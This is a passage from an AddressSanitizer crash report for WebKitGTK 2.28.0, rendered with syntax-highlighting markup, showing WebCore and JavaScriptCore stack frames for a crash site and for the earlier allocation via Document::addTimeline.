class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">194</span><br> #<span class="hljs-number">41</span> <span class="hljs-number">0</span>x7fbd03af7167 in createHTMLScriptElementWrapper DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">527</span><br> #<span class="hljs-number">42</span> <span class="hljs-number">0</span>x7fbd03b10e86 in WebCor<span class="hljs-number">e::</span>createJSHTMLWrapper(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">795</span><br> #<span class="hljs-number">43</span> <span class="hljs-number">0</span>x7fbd0511cd70 in createNewElementWrapper Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">44</span> <span class="hljs-number">0</span>x7fbd0511cd70 in WebCor<span class="hljs-number">e::</span>toJSNewlyCreated(JS<span class="hljs-number">C::</span>JSGlobalObject*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">77</span><br> #<span class="hljs-number">45</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>JSConverter<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element> ><span class="hljs-number">::</span>convertNewlyCreated<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertInterface.h:<span class="hljs-number">87</span><br> #<span class="hljs-number">46</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">162</span><br> #<span class="hljs-number">47</span> <span class="hljs-number">0</span>x7fbd037ec467 in st<span class="hljs-number">d::</span>enable_if<WebCor<span class="hljs-number">e::</span>IsExceptionOr<WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > ><span class="hljs-number">::</span>value, JS<span class="hljs-number">C::</span>JSValue><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, JS<span class="hljs-number">C::</span>ThrowScope&, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">202</span><br> #<span class="hljs-number">48</span> <span class="hljs-number">0</span>x7fbd037ec467 in jsDocumentPrototypeFunctionCreateElementBody DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5071</span><br> #<span class="hljs-number">49</span> <span class="hljs-number">0</span>x7fbd037ec467 in call<WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElementBody> Source/WebCore/bindings/js/JSDOMOperation.h:<span class="hljs-number">53</span><br> #<span class="hljs-number">50</span> <span class="hljs-number">0</span>x7fbd037ec467 in WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElement(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>CallFrame*) DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5076</span><br> #<span class="hljs-number">51</span> <span class="hljs-number">0</span>x7fbca<span class="hljs-number">9342177</span> (<unknown module>)<br> #<span class="hljs-number">52</span> <span class="hljs-number">0</span>x7fbcfaab3104 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0x3112104</span>)<br> #<span class="hljs-number">53</span> <span class="hljs-number">0</span>x7fbcfaa9c161 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0</span>x30fb161)<br> #<span class="hljs-number">54</span> <span class="hljs-number">0</span>x7fbcfa7666ec in JS<span class="hljs-number">C::</span>JITCo<span class="hljs-number">de::</span>execute(JS<span class="hljs-number">C::</span>VM*, JS<span class="hljs-number">C::</span>ProtoCallFrame*) Source/JavaScriptCore/jit/JITCodeInlines.h:<span class="hljs-number">38</span><br> #<span class="hljs-number">55</span> <span class="hljs-number">0</span>x7fbcfa73f66f in JS<span class="hljs-number">C::</span>Interpreter<span class="hljs-number">::</span>executeCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSObject*, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/interpreter/Interpreter.cpp:<span class="hljs-number">910</span><br> #<span class="hljs-number">56</span> <span class="hljs-number">0</span>x7fbcfaf7441c in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">59</span><br> #<span class="hljs-number">57</span> <span class="hljs-number">0</span>x7fbcfaf7459f in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">66</span><br> #<span class="hljs-number">58</span> <span class="hljs-number">0</span>x7fbcfaf74a8f in JS<span class="hljs-number">C::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">87</span><br><br>previously allocated by thread T0 here:<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd0ae8fb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.<span class="hljs-number">4</span>+<span class="hljs-number">0</span>xdeb40)<br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbcfc05f7c8 in WT<span class="hljs-number">F::</span>fastMalloc(unsigned long) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">201</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbcfc05f7f0 in WT<span class="hljs-number">F::</span>fastZeroedMalloc(unsigned long) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">95</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>FastMallo<span class="hljs-number">c::</span>zeroedMalloc(unsigned long) DerivedSources/ForwardingHeaders/wtf/FastMalloc.h:<span class="hljs-number">206</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>allocateTable(unsigned int) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1210</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>rehash(unsigned int, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1322</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd0201070c in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>expand(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1244</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd02cd3b60 in WT<span class="hljs-number">F::</span>HashTableAddResult<WT<span class="hljs-number">F::</span>HashTableIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > > WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span><WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">929</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span>(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">467</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span>(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">241</span><br> #<span class="hljs-number">10</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashTableAddResult<WT<span class="hljs-number">F::</span>HashTableIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > > WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline><span class="hljs-number">::add</span><WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span class="hljs-number">e::</span>DocumentTimeline const&) DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">103</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>addTimeline(WebCor<span class="hljs-number">e::</span>DocumentTimeline&) Source/WebCore/dom/Document.cpp:<span class="hljs-number">8059</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd04fb4588 in WebCor<span class="hljs-number">e::</span>DocumentTimelin<span class="hljs-number">e::</span>DocumentTimeline(WebCor<span class="hljs-number">e::</span>Document&, WT<span class="hljs-number">F::</span>Seconds) Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">70</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd04fb4be7 in WebCor<span class="hljs-number">e::</span>DocumentTimelin<span class="hljs-number">e::</span>create(WebCor<span class="hljs-number">e::</span>Document&) Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">56</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0590d0a4</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>timeline() Source/WebCore/dom/Document.cpp:<span class="hljs-number">8070</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd038177ae in jsDocumentTimelineGetter DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">2296</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd038177ae in get<WebCor<span class="hljs-number">e::</span>jsDocumentTimelineGetter, (WebCor<span class="hljs-number">e::</span>CastedThisErrorBehavior)<span class="hljs-number">3</span>> Source/WebCore/bindings/js/JSDOMAttribute.h:<span class="hljs-number">69</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd038177ae in WebCor<span class="hljs-number">e::</span>jsDocumentTimeline(JS<span class="hljs-number">C::</span>JSGlobalObject*, long, JS<span class="hljs-number">C::</span>PropertyName) DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">2302</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbcfb5c41b1 in JS<span class="hljs-number">C::</span>PropertySlot<span class="hljs-number">::</span>customGetter(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName) const Source/JavaScriptCore/runtime/PropertySlot.cpp:<span class="hljs-number">50</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbcf994b40d in JS<span class="hljs-number">C::</span>PropertySlot<span class="hljs-number">::</span>getValue(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName) const Source/JavaScriptCore/runtime/PropertySlot.h:<span class="hljs-number">422</span><br> #<span class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbcfab2381c in JS<span class="hljs-number">C::</span>JSValu<span class="hljs-number">e::</span>get(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName, JS<span class="hljs-number">C::</span>PropertySlot&) const Source/JavaScriptCore/runtime/JSCJSValueInlines.h:<span class="hljs-number">886</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbcfab2381c in llint_slow_path_get_by_id Source/JavaScriptCore/llint/LLIntSlowPaths.cpp:<span class="hljs-number">763</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbcfaaa4eb5 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0</span>x3103eb5)<br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbcfaab2f87 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0x3111f87</span>)<br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbcfaa9c161 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0</span>x30fb161)<br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbcfa7666ec in JS<span class="hljs-number">C::</span>JITCo<span class="hljs-number">de::</span>execute(JS<span class="hljs-number">C::</span>VM*, JS<span class="hljs-number">C::</span>ProtoCallFrame*) Source/JavaScriptCore/jit/JITCodeInlines.h:<span class="hljs-number">38</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbcfa73f66f in JS<span class="hljs-number">C::</span>Interpreter<span class="hljs-number">::</span>executeCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSObject*, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/interpreter/Interpreter.cpp:<span class="hljs-number">910</span><br> #<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfaf7441c in JS<span class="hljs-number">C::</span>call(JS<span 